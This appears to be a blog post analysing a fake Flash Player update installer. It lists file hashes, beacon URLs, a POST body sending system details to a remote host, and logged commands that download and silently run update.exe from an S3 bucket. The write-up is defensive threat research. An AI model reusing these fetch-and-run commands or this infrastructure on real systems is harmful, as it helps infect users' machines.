I came across a bit of crap today which, I’m not sure how the user ended up on it, claimed that it was a Flash Player Update when browsing a website.
SHA256: 1047c747b1ae3fa34192c3851d358ed0c4369daf8e2c70fc9f2a3c0d256d16b1
VirusTotal Report / Malwr Report
Setup.exe – Signed with a valid certificate S/N: “0e 92 3b 9c f6 0d a5 9f c3 a4 3a 87 a8 07 1f c2”
Publisher Plugin Update S.L.
Product taskhost
Original name taskhost.exe
Internal name taskhost.exe
File version 5. 4. 5. 4
When you run the file, in my case, it made the following requests:
http://e0isq0.v6kgr1d.com/__dmp__/
Host: maxirg00.maxisrv.com [5.196.157.0]
inetnum: 5.196.157.0 – 5.196.157.15
netname: OVH_69328147
descr: OVH Static IP
country: PL
The domain whois is protected with a privacy service.Containing the following POST data:
data={“publisher”: “638”, “uid”: “1420730682899BJjYYTITkj”, “campaign”: “1844”, “lpd”: “www.thefilesbox.com”, “ip”: “89.213.13.42”, “tt”: “6176d2f3a243f29b0b25b2047636830f63c7c4ff”, “fileName”: “Setup”, “requestHost”: “e4lvdpezempl.v6kgr1d.com”, “referer”: “”, “sbb_check”: “[‘1’]”, “time”: “2015/01/08 15:24:43”, “userAgent”: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36”, “osVersion”: “0”, “os”: “Win7”, “browser”: “ch”, “url”: “”, “usedBrowser”: “ch”, “sign”: “uv9”, “caption”: “”, “host”: “domain.com”, “carrier”: “FastPlayerPro”,”version”:”2.0.15″,”1″:0,”2″:0,”3″:0,”4″:0,”5″:0,”6″:0,”7″:0,”8″:1,”9″:0,”10″:0,”11″:0,”12″:0,”13″:0,”14″:1,”15″:0,”17″:0,”18″:0,”19″:0,”20″:0,”21″:0,”22″:0,”23″:1,”24″:0,”25″:0,”26″:0,”27″:0,”28″:0,”29″:0,”30″:0,”31″:1,”32″:0,”33″:0,”34″:0,”35″:0,”36″:0,”37″:0,”38″:0,”39″:0,”40″:0,”41″:0,”42″:0,”TYPE”:”TP”}
The domain in the above text, thefilesbox.com, is also registered using the same privacy service as the spamware domain. This domain doesn’t seem to be resolving right now though.
It then responds with nearly 500kb of data which can be seen here: http://pastebin.mozilla.org/8231405
It looks like the behavior or junk installed might vary depending on what anti-viruses exist on the system.
What is quite funny is one of the variables: gratitudeURL has the phrase “Thank you for trusting us for your downloads”.. given that they are just about to install a virus on your system this seems a bit rich.
The domain it is hosted on, step-congrats.com, is also has whois privacy applied by the same company as the other domains involved. The http content is hosted at Amazon Web Services
c:\windows\rcore.exe gets dumped into your system by one of the things it downloads.
VirusTotal Report / Malwr Report
SHA256: 6c378c52c4dfc12d09e937aa3e1ab75245a6a6c2c4ec7b1a46b9a28e29e7113f
Every 60 seconds it continues to make contact with
http://e0isq0.v6kgr1d.com/60fa5343f81a5979c60c40a04daefb0308436b1aded80b538e3e71e1f1e3b4d90d548859e973777857f3366595879b5ff26b3bcfcfd9b48b
Which replies with 7, MAXTHX,, 0.
The entire traffic style is very similar to a botnet CnC type communication.
If you are stupid and accept the install / click next.. it then goes crazy with requests to random partners / installs.
Commands such as the following..
C:\Users\User\AppData\Local\Temp\nsa4AF6.tmp\check20.exe http://pepperware.s3.amazonaws.com/pepperzip/update/update.exe update.exe /S /A 10115
C:\Windows\system32\cmd.exe /c “”C:\Users\User\AppData\Local\Temp\2840.bat” “C:\Users\User\AppData\Local\Temp\cddc8884-cdfb-42d1-ac19-103343754823\setup.exe””
Other domains involved:
http://www.pngap17n.com/XYykUKym/support.html
Hosted at Amazon Web Services. Domain whois protection by the same company as all the other domains.
http://www.9athzou6u.com/74585040792F3B4B466957637665736E984603B1048E006E2428C46EE7643E8AB4BBD3A9C2389499085FC3309464C2A9
Hosted at Amazon Web Services. Domain whois protection by the same company as all the other domains.
All the working domains seem to use the following DNS servers:
ns1.dnsroutingsrv.com
ns2.dnsroutingsrv.com
thecomputerperson 